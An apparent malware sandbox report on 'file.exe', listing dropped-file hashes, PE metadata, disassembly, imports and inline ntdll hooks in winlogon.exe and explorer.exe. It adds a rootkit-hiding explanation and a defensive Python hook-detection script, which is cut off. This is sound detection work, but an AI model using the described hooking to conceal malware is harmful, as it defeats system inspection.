SSDEEP: | 1536:lKlKkKPKhKNK8KZKMKtKAKZKxKtKPKcKlK2KOK8K4KMKpKwKoKEKLKVK5KxKmKGm:lKlKkKPKhKNK8KZKMKtKAKZKxKtKPKck |
MD5: | 4DBEDD8B1F83E96AA3D66C86D18BB596 |
SHA1: | 1B8D188A835D73D62CF074ED54F1C28E0452244B |
SHA-256: | 237E5699A115E46545B09BCCDC55D18CBB1FBA3342613BD119E96148FCE13CFD |
SHA-512: | C5AAB6701438FD6B752B625885D58BCB711E8FDA8D21DD08525468D479D240C9784F7C0DD85756F074E9FE171618AD2E975C0C4639D586620F1B49B83DF2ECDE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.2584767503070673 |
Encrypted: | false |
SSDEEP: | 384:oheiViXiii3ieiAiAioiXiKiNi4iciHiyigihiFiqiCiwishi4i3iWi:o |
MD5: | 55950B9A9DBBF2E002DFA59B16AAC172 |
SHA1: | C52475DCE560E426DBB06CA26F84578DDD514C43 |
SHA-256: | DF41692DFCEABED3E540CCA07D24756E5AD2C3007D7392B140F3365F00B73624 |
SHA-512: | 4490C3CDF7CE5CD7694A0B89CCE0D2D400953DE28E9245148CB602175B2E911421EFE150E953E5C88FC85EFFE6A23D6A45371565BAAD0B6FB28AD9CE97F68C67 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 4.236150334313226 |
Encrypted: | false |
SSDEEP: | 768:F5aoffaBahaVatatapala1aEa+aaa0acaaajaraHaYa8a+araDaNa2aFaranaXaY:/fP |
MD5: | A9D1157400248F26B69127B24B3EBED7 |
SHA1: | 4F005F4241A995441E5091C484BFE9DD13EF903A |
SHA-256: | 717529C5719FDF40B141C5A8E937133BD4010BA20C0721939F358D5E5889D51A |
SHA-512: | E53998EEBE4670568A003BB94E3BC6E483CE2DA63CE87C7C83D492936FC1611D5CF15BFA94DF9392D7B7059B59A3DDC9471BE03204A85314F584573C4745BA2F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 2.186757899279565 |
Encrypted: | false |
SSDEEP: | 384:PhkXXXIZXoXfHXhXTXIXHXIXfXNXlCXTXvXKXQXiXnXLXJXvXdXGXoX3XdX2XcXp:PRQJ |
MD5: | 48AF79737C8F3EA5BA0EC3AE52D01335 |
SHA1: | 146ED6348061A1232C32D210B1D75DB2C7F3AC7A |
SHA-256: | 9865C59195804F6FE335AAFF273DE8FE09A926F22F29E2E02FD4177221978E24 |
SHA-512: | 72C19DF7C968B1099EA5954DA59FC2F2F37841DF746AD68A88DBD1883253983C59C7B6533F67685AFB2F8941899A90E6017D735E73EB3FC58061AF9AE3671101 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 4.281469656005786 |
Encrypted: | false |
SSDEEP: | 768:xTtNTbDvefzf3w4/SDEnIQUkwlgz89IrArkG8R:Wy |
MD5: | A8D0DD9A1601948BC9A8E224A693D6EB |
SHA1: | 4597EF2E5282F67513F5834B85C66DB551B1CA66 |
SHA-256: | E3899E786A7D40152F8C802DEC8733B9783DEDF65578C31E26767B0153CEA2EA |
SHA-512: | CCE55F3A88DE0DBAA0EA18C8C244A111567176D319604CE0163A80D283E8ECDB2E7ECDD3D022C7056AD5FF11D6140193C51AC0A3980387E036B5605ECD3E2216 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.9478010062992827 |
Encrypted: | false |
SSDEEP: | 384:GhIw2z72L2e2K2x2j28262j2F2g2q2J2X2U2y2n2l2w2:G4 |
MD5: | 9A734815B7976006A98509CAD9A7C61C |
SHA1: | 691C1A3BE82F87526EC0207CD9502E20102EAE8A |
SHA-256: | 38BB165AE5D446E1C70A9717A333D09EFC072F5FE254EC48FDA427585232525E |
SHA-512: | AC7FA4277BF7E3FBDBFA63E9FBE93FD2C6E9BE2C905E7D6799AD7650DEBD723E9BDB414A5AC839FDD5B420D0451ABB4E016D3C1AD510B5CB18996AE35BDF231E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4728 |
Entropy (8bit): | 3.898603220819061 |
Encrypted: | false |
SSDEEP: | 48:MB5WW2HRtill/nV2JfJ4Y9yL9ANJfJjbjyCyVgwJfJjZtHnJfJf4eoo2HRtill/M:ljaV2RFyRyRxfiVfR1HRaei1RFIR1u |
MD5: | 822F33868E0CAC502E8683CDBE875543 |
SHA1: | 1AC0BAF5FFAB65D715ED5E6D21679B91E3E674F4 |
SHA-256: | 3F7204CAD2D578B05FBD73A1B976D6AC979145FCACD83908700D361CF12BC939 |
SHA-512: | 1717547DC8C8177C96A8E2C44FB139F938A49A44D8A5C68E940859A8ED0E355055C3DBF7D35F948557D61520F3A908AF4FEC6E93F62A94E4D260EE53163530CB |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 3.8087925092526325 |
Encrypted: | false |
SSDEEP: | 384:Fh9h1hvh+h/h8hBhHFhKJhFhxhShxdh6h0hhhThah+hXhFhjh8hdhehrchHhGhvF:F/eCu7jg |
MD5: | AA17B591FB49AAE70E2FDA0A4E29A233 |
SHA1: | BEC6E44E22A3BA270A9CFB62C7E6EA7D17CB3C4C |
SHA-256: | A2BCE7FFA058FC98D852E68182755E8F53B17AA13C832B06FD4687AF6025BB63 |
SHA-512: | BDA1B574C861BD7BC6CD6ED9DFA22165D090A08CAAA22D406D5365DE80207770B4C64B700156D4765DB3205E5BD9F05E7129B206AA04E608E3CD469E44F846AE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 3.8807169826709864 |
Encrypted: | false |
SSDEEP: | 384:1hsV80VUVAOV+8VPVRV8VuV4VCVlViVLVbVhV9V8VcVMVXUg7/TP5uc8WfJ5S0Gd:1/Mfg7/TP5ucrk0G9G9SAMLgM |
MD5: | 064E49AC92987291E981ADB98DCBA198 |
SHA1: | F61B1497809498EC96D19F83B286177E51A67885 |
SHA-256: | D347274F9AEB33C419AF04A170FE151DDEA3245DA52C4B838A1B5531FFB1EBC2 |
SHA-512: | E50E19A729CD6DAB2306FE36455675938098A3459C9006127CD9A7D29D548109083176B3E1694A6E855260AE7C89F0FF9EF60F44BBC420256F07903FF96AD44F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 3.6633174586145385 |
Encrypted: | false |
SSDEEP: | 768:c2iNZ5Pu7HjHgU/PA4nzPv48vrAQ3noAYoFJrDf04rfIcbj04rfPHU0jLg40gvPP:R |
MD5: | F39C76A8FC3F0F9C8113E55EFDE95043 |
SHA1: | 4B0B10FAE8F4177EFD271851FCCA4DEB04D7206D |
SHA-256: | 92FF8AEA6304F3C76EBE3FE6ACC11AAA4BA785CDA108BF0DE77F5681E4BAB5EC |
SHA-512: | CC9E8A6D9D3A49DFC0700289CD730998E8A7FC85FD173E95DEC63D1706EC9E1C0CB263A98479249AE1BC1791740241550E5901A5C458FED5C011C8F5D21DBCC3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98688 |
Entropy (8bit): | 3.0674599562280402 |
Encrypted: | false |
SSDEEP: | 768:AK2aSb+oY4pY+GhjYsx+Oa9rs4b6l3Ju6FWORIk5QHCMjAy/RBKkdD98XIA7K2aN:Xw |
MD5: | 6094AA9502825079EBF495AD9C3ACA97 |
SHA1: | 7D11E3D59833170BF2480892F8906F8F039EA944 |
SHA-256: | 4A38FBE94A3819BED941E6D51FDF6A5A26AE4D9039CC0D4FA850E674746D94A2 |
SHA-512: | AB1D6FBAA45183A07DD7363A2640519E028F40333EB9B1EA1B5E044ADBFF71DFD678899022E73E0BAF4C8650998D5DFD06B16904710B0909D3D68E5A66B9E5AF |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 4.242930031881895 |
Encrypted: | false |
SSDEEP: | 384:ph/BwBeabuSBwBTBwBlBwB1BwBPBwBXBwB+BwB6BwBWBwBUBwBSBwBUBwBeBwBFX:p7abRi+DFLVLZVN |
MD5: | 38C0FBCA2A34F3DD78D292B4A6E10C87 |
SHA1: | 00626EF5F25CDEDC9AC2210234E62ADDA943517E |
SHA-256: | F4A786DFDFDF53A60C89D3D9690C20F878B6383A61C7300815FC6FE7F850C0CD |
SHA-512: | 1FFBD35D282021B43BE7C44162AC91CE396384D3EBA8D63B85FAF138BC6CC91BDDBBF23A48A11BA5B382176BC7A3DDFE5DE8121ACC7BC996EC69BCBCCE49E5D5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.5509093890179249 |
Encrypted: | false |
SSDEEP: | 384:ihErUEyUEYUE9UEOUE5UEdTUEgUEdHUEtUEzUEUUElZUEkUEsUE8UElUEeUEoUE9:ie4Y3 |
MD5: | 99897A421122019E38AFD3B6235F8A03 |
SHA1: | 4FB8942FF9460B9EF08F46CCD18BFE8DA3069263 |
SHA-256: | 7776E5B09F9125AFA0EFA6ED75A9707AC43B179A679F44E0F5A87FB4CBFA977F |
SHA-512: | 75A28ECFB67075F956C129D4DAC38BB0F8730B5BCDCD292B655803553DEA26E444A1192F652C653E9239D39DBFA46817F4476E5167DB2E5DF29076A1A3B20E90 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 4.176100082151436 |
Encrypted: | false |
SSDEEP: | 384:NFRvLoyoAjoKuoPfFDG0ocMtnnEHKQYLoLo1ZoUwo8MtXAo8Mt7oIuEgo8Mtqfom:PBBl |
MD5: | 0DA901C6028EC1132501EAD2AD5A86B4 |
SHA1: | 663B2CBA78442914FE420D58F7F229BBE6ED1AE0 |
SHA-256: | 177E53BDBC05974D8755EF31E3F76F418C7C25FDCE7B44B8C54198411E9D7B9B |
SHA-512: | 62C4DB34D1D6C4019CB36A34DA44BED84FDABBA816B1EE2B3C286738558403DD7EB68B65F0540F36FCB67B0EFA0A0016FB8160542DAB9E881CC9D7F8C828FCE6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2480 |
Entropy (8bit): | 3.935016658895314 |
Encrypted: | false |
SSDEEP: | 48:M+2Lk/6jTUGSTUMUBaQKp5AlhPZlf0xKi+yFB58y78gCKuKh:KOmTU5TUMUBo6Vf0xXB58y7bCtW |
MD5: | B6570B055FC21150FD2DE1312C34E5AA |
SHA1: | 9701E12B4F0EE8CA23D314C9FAC0307F66CAA9B9 |
SHA-256: | E065D511AC3921E5F0A6F6D436BE3131B7E024BB3C41C693655DD10C237BE870 |
SHA-512: | 39014DE3E960E0D9ED0BFC1D15DFA892D315886268ACA328CDDCDA8E91AED6F9E21D0456A142CF518ABBE3EA3C8AD4D35349B684709F3865AD88754BC08652D4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 27536 |
Entropy (8bit): | 3.8130179832121898 |
Encrypted: | false |
SSDEEP: | 384:B9v49vS9vk9v7i9vR9ve9vJl9vJeqOdqOjqOJqOxBqOmqOOqOXqOc:L42cKjaRHRehPVbCKD4 |
MD5: | 620193084B1A93183D75EF6E59204B8F |
SHA1: | 2FF0AB400831E6DF7DE1B29C52EED795F94B526D |
SHA-256: | 0CC5F4A2C676292D4E6C015E0DB5FB02DE625ED60C1C613C8C1F30D1B1CD8826 |
SHA-512: | A0C6F454141A897181A13DF1EF784BE5FADA264BF03498F019FAA12E512C2F764E749F8816D025C1F676192F850D2AE2AB2F71568DE2D0B0A5BF4151590A7D07 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\wbem\WMIADAP.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3444 |
Entropy (8bit): | 5.011954215267298 |
Encrypted: | false |
SSDEEP: | 48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW |
MD5: | B133A676D139032A27DE3D9619E70091 |
SHA1: | 1248AA89938A13640252A79113930EDE2F26F1FA |
SHA-256: | AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15 |
SHA-512: | C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.644002604978999 |
TrID: | |
File name: | file.exe |
File size: | 10264640 |
MD5: | eee7b971e0b76a0df56bdac2ac2fa343 |
SHA1: | c80f9d9de5d0dff115bbb7638554dade321d7c65 |
SHA256: | ecd60313ba990f1300b37db4064977e83f109fdf93a728cf434106c1b5b5a2d5 |
SHA512: | fffd216c820b3be324ac72a46c50683b42218deaf95c219670c3f44c091424e8ed5fc42b28f4aab46e8024a52cbe4ca989031ca3641536f3fae0a2b5f4f79e85 |
SSDEEP: | 98304:AScdwkEObD07UX4SIf6Ky9UBMJs52fvaUhOAllh3uJZbZSvHzmmkvgDlWBixnxCa:Ald3Z0I2T0gAfCbZSvTlRXqbtci+ |
TLSH: | 29A6D06D86866FE6EB880AF3491D47B6DEE21DF425E7E13180F8DF3325FA8800395195 |
File Content Preview: | MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......d...............&.....\...*.............@....................................$.....`... ............................ |
Icon Hash: | 3271ccd4b2e07106 |
Entrypoint: | 0x1400014b0 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x140000000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED |
DLL Characteristics: | HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT |
Time Stamp: | 0x6482B51E [Fri Jun 9 05:14:06 2023 UTC] |
TLS Callbacks: | 0x40010560, 0x1, 0x40010530, 0x1 |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | f7505c167603909b7180406402fef19e |
Signature Valid: | false |
Signature Issuer: | CN=DigiCert Assured ID Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US |
Signature Validation Error: | The digital signature of the object did not verify |
Error Number: | -2146869232 |
Not Before, Not After: | |
Subject Chain: | |
Version: | 3 |
Thumbprint MD5: | 2C3567A8535342474E8B4C4BC12317CB |
Thumbprint SHA-1: | 6F474206BCBB391BB82BA9E5DC0302DEF37AEBBE |
Thumbprint SHA-256: | B6D977A471725F37DE725D31A36D4BE7CA6D0DABEB7F1F1F597E43045B83ABBE |
Serial: | 05308B76AC2E15B29720FB4395F65F38 |
Instruction |
---|
dec eax |
sub esp, 28h |
dec eax |
mov eax, dword ptr [009C1545h] |
mov dword ptr [eax], 00000001h |
call 00007FA828A254CFh |
nop |
nop |
dec eax |
add esp, 28h |
ret |
nop dword ptr [eax] |
dec eax |
sub esp, 28h |
dec eax |
mov eax, dword ptr [009C1525h] |
mov dword ptr [eax], 00000000h |
call 00007FA828A254AFh |
nop |
nop |
dec eax |
add esp, 28h |
ret |
nop dword ptr [eax] |
dec eax |
sub esp, 28h |
call 00007FA828A3DAE4h |
dec eax |
test eax, eax |
sete al |
movzx eax, al |
neg eax |
dec eax |
add esp, 28h |
ret |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
dec eax |
lea ecx, dword ptr [00000009h] |
jmp 00007FA828A257E9h |
nop dword ptr [eax+00h] |
ret |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
nop |
dec eax |
lea eax, dword ptr [009C74A9h] |
dec eax |
lea edx, dword ptr [eax+21h] |
mov byte ptr [eax], 00000000h |
dec eax |
add eax, 01h |
dec eax |
cmp eax, edx |
jne 00007FA828A25806h |
ret |
dec eax |
lea eax, dword ptr [009C7451h] |
dec eax |
lea edx, dword ptr [eax+18h] |
mov word ptr [eax], 0000h |
dec eax |
add eax, 02h |
dec eax |
cmp eax, edx |
jne 00007FA828A25804h |
ret |
dec eax |
lea eax, dword ptr [009C7417h] |
dec eax |
lea edx, dword ptr [eax+14h] |
mov word ptr [eax], 0000h |
dec eax |
add eax, 02h |
dec eax |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9ca000 | 0xa34 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9cd000 | 0xa80 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x9c4000 | 0x1230 | .pdata |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x9c6000 | 0x4040 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9ce000 | 0x330 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x9c2000 | 0x28 | .rdata |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9ca28c | 0x250 | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x1aa20 | 0x1ac00 | False | 0.4646429614485981 | data | 6.160137509897198 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.data | 0x1c000 | 0x9a26e0 | 0x9a2800 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rdata | 0x9bf000 | 0x4270 | 0x4400 | False | 0.38338694852941174 | data | 4.987899244906076 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.pdata | 0x9c4000 | 0x1230 | 0x1400 | False | 0.4341796875 | data | 4.865236906764568 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.xdata | 0x9c6000 | 0xf44 | 0x1000 | False | 0.241455078125 | data | 4.036582842306508 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.bss | 0x9c7000 | 0x28e0 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.idata | 0x9ca000 | 0xa34 | 0xc00 | False | 0.3046875 | data | 3.8892775409781057 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.CRT | 0x9cb000 | 0x60 | 0x200 | False | 0.06640625 | data | 0.3085875245953951 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.tls | 0x9cc000 | 0x10 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x9cd000 | 0xa80 | 0xc00 | False | 0.3518880208333333 | data | 4.0923733872388315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.reloc | 0x9ce000 | 0x330 | 0x400 | False | 0.5712890625 | data | 4.774016362476347 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_ICON | 0x9cd130 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States |
RT_GROUP_ICON | 0x9cd418 | 0x14 | data | English | United States |
RT_VERSION | 0x9cd430 | 0x324 | data | English | United States |
RT_MANIFEST | 0x9cd758 | 0x325 | XML 1.0 document, ASCII text | English | United States |
DLL | Import |
---|---|
KERNEL32.dll | CloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSemaphore, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte |
msvcrt.dll | __C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, fputc, fputs, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr |
Language of compilation system | Country where language is spoken |
---|---|
English | United States |
Code Manipulations
Function Name | Hook Type | Active in Processes |
---|---|---|
ZwEnumerateKey | INLINE | winlogon.exe, explorer.exe |
NtQuerySystemInformation | INLINE | winlogon.exe, explorer.exe |
ZwResumeThread | INLINE | winlogon.exe, explorer.exe |
NtDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe |
ZwDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe |
NtEnumerateKey | INLINE | winlogon.exe, explorer.exe |
NtQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe |
ZwEnumerateValueKey | INLINE | winlogon.exe, explorer.exe |
ZwQuerySystemInformation | INLINE | winlogon.exe, explorer.exe |
NtResumeThread | INLINE | winlogon.exe, explorer.exe |
RtlGetNativeSystemInformation | INLINE | winlogon.exe, explorer.exe |
NtQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe |
NtEnumerateValueKey | INLINE | winlogon.exe, explorer.exe |
ZwQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe |
ZwQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe |
Function Name | Hook Type | New Data |
---|---|---|
ZwEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF |
NtQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF |
ZwResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F |
NtDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F |
ZwDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F |
NtEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF |
NtQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF |
ZwEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F |
ZwQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF |
NtResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F |
RtlGetNativeSystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF |
NtQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF |
NtEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F |
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF |
ZwQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF |
Function Name | Hook Type | New Data |
---|---|---|
ZwEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF |
NtQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF |
ZwResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F |
NtDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F |
ZwDeviceIoControlFile | INLINE | 0xE9 0x97 0x73 0x36 0x64 0x4F |
NtEnumerateKey | INLINE | 0xE9 0x93 0x33 0x35 0x5D 0xDF |
NtQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF |
ZwEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F |
ZwQuerySystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF |
NtResumeThread | INLINE | 0xE9 0x91 0x13 0x35 0x58 0x8F |
RtlGetNativeSystemInformation | INLINE | 0xE9 0x93 0x33 0x35 0x5B 0xBF |
NtQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF |
NtEnumerateValueKey | INLINE | 0xE9 0x97 0x73 0x36 0x61 0x1F |
ZwQueryDirectoryFileEx | INLINE | 0xE9 0x9E 0xE3 0x33 0x3B 0xBF |
ZwQueryDirectoryFile | INLINE | 0xE9 0x91 0x13 0x35 0x5C 0xCF |
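Every row in the hook tables starts with 0xE9: a 5-byte jmp rel32 written over the export's first bytes (the sixth byte shown is simply whatever followed it). The functions chosen, NtQueryDirectoryFile/Ex, NtEnumerateKey/ValueKey, NtQuerySystemInformation, NtDeviceIoControlFile and NtResumeThread, are the set a user-mode rootkit patches to hide files, registry keys, processes and network objects from anything enumerating through winlogon.exe or explorer.exe. Nt*/Zw* pairs carry identical bytes because in ntdll both names export the same address, and the four bytes after 0xE9 are a signed 32-bit displacement from the byte following the jmp. The script below is an added example, not the sandbox's own detection code: it classifies the common inline-hook stubs (jmp rel32, jmp [rip+disp32], mov rax,imm64; jmp rax, push imm32; ret), recognizes the clean Windows 10 x64 syscall stub so the syscall number can be recovered from the on-disk copy, and diffs live prologues against clean ones. The hook bytes in REPORT_HOOKS are copied from the table above; the ntdll base address, the export RVAs and the syscall numbers in CLEAN are constructed for the example and do not come from this report.

```python
"""Classify and locate inline hooks at the start of ntdll exports (added example)."""
import struct

MASK64 = (1 << 64) - 1

# Hook bytes copied from the report's "Code Manipulations" table (winlogon.exe / explorer.exe).
REPORT_HOOKS = {
    "ZwEnumerateKey":           bytes.fromhex("E99333355DDF"),
    "NtQuerySystemInformation": bytes.fromhex("E99333355BBF"),
    "ZwResumeThread":           bytes.fromhex("E9911335588F"),
    "NtDeviceIoControlFile":    bytes.fromhex("E9977336644F"),
    "NtQueryDirectoryFile":     bytes.fromhex("E99113355CCF"),
    "NtQueryDirectoryFileEx":   bytes.fromhex("E99EE3333BBF"),
    "NtEnumerateValueKey":      bytes.fromhex("E9977336611F"),
}


def classify_prologue(code, addr=0):
    """Return (kind, value) for the first bytes of a function located at `addr`.
    value is the absolute branch target for hook stubs, the syscall number for a
    clean x64 ntdll stub (mov r10, rcx; mov eax, SSN), or None."""
    if len(code) >= 5 and code[0] == 0xE9:                       # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp rel32", (addr + 5 + rel) & MASK64
    if len(code) >= 6 and code[:2] == b"\xFF\x25":                # jmp qword ptr [rip+disp32]
        disp = struct.unpack_from("<i", code, 2)[0]
        return "jmp [rip+disp32]", (addr + 6 + disp) & MASK64   # address of the pointer slot
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return "mov rax,imm64; jmp rax", struct.unpack_from("<Q", code, 2)[0]
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:    # push imm32; ret
        return "push imm32; ret", struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 8 and code[:4] == b"\x4C\x8B\xD1\xB8":        # clean Win10 x64 syscall stub
        return "syscall stub", struct.unpack_from("<I", code, 4)[0]
    return "unknown", None


def find_hooks(live, clean, base):
    """Diff the prologue of every export between the live process (`live`) and the
    on-disk module (`clean`); both map name -> (rva, bytes).  Returns findings by name."""
    findings = []
    for name in sorted(live):
        rva, live_code = live[name]
        _, clean_code = clean[name]
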